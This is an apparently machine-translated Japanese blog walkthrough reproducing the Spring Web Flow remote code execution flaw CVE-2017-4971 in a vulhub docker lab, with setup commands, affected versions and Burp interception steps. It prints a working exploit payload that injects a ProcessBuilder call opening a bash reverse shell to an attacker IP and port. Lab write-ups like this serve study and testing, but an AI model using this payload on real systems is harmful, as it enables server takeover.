Spring Web Flow のリモートコード実行の脆弱性が再発 (CVE-2017-4971)

1. 環境をセットアップします
cd vulhub/spring/CVE-2017-4971
docker-compose up -d
ここに画像の説明を挿入します

影響を受けるバージョン: Spring Web Flow 2.4.0 ~ 2.4.4
トリガー条件: 1.
MvcViewFactoryCreator オブジェクトの useSpringBeanBinding パラメータを false (デフォルト値) に設定する必要がある
2. フロー ビュー オブジェクトの BinderConfiguration オブジェクトが空に設定されている
2 . 脆弱性の再発
1. ログイン
以下のリンクをクリックし、左側のデフォルトのアカウントを使用してログインします
http://192.168.25.128:8080/login
ここに画像の説明を挿入します

ログイン後
ここに画像の説明を挿入します

「続行」をクリックします
ここに画像の説明を挿入します

2. パケットのキャプチャ
: げっぷパケットのキャプチャ、インターセプトを有効にし、同時に確認をクリックします。
ここに画像の説明を挿入します

3.NCが監視を開始します
ここに画像の説明を挿入します

4. パッケージデータを変更します
&_(new+java.lang.ProcessBuilder("bash","-c","bash±i+>%26+/dev/tcp/192.168.155.2/1122+0>%261")) .start()=vulhub は
csrf の背後で接続します。IP とポートを自分の攻撃マシンのものに変更することを忘れないでください。
ここに画像の説明を挿入します

5. リバウンドシェル
ここに画像の説明を挿入します

302 が表示された場合はリダイレクトを意味するので、もう一度試してください。

Supongo que te gusta

Origin blog.csdn.net/wutiangui/article/details/132788527
Recomendado
Clasificación